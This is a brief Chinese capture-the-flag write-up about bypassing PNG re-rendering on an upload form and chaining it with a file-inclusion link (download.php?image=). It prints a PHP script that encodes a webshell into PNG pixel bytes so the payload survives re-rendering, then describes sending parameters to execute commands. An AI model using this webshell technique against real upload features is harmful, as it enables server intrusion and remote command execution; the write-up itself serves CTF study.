- 这里题目提示改头换面,看了下源码,发现有个
<a href='download.php?image=好像是文件包含的链接 - 上传图片发现,只能上传
png,上传成功后,把图片下载下来后发现大小不一样,应该是被二次渲染了 - 这里利用
png二次渲染的脚本生成png图片,进行上传
```php <?php
/<?$_GET0;?>/
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) { $r = $p[$y]; $g = $p[$y+1]; $b = $p[$y+2]; $color = imagecolorallocate($img, $r, $g, $b); imagesetpixel($img, round($y / 3), 0, $color); }
imagepng($img,’1.png’); ```
- 成功后点击访问拖页面,抓包提交参数达到命令执行
若有收获,就点个赞吧
0 人点赞
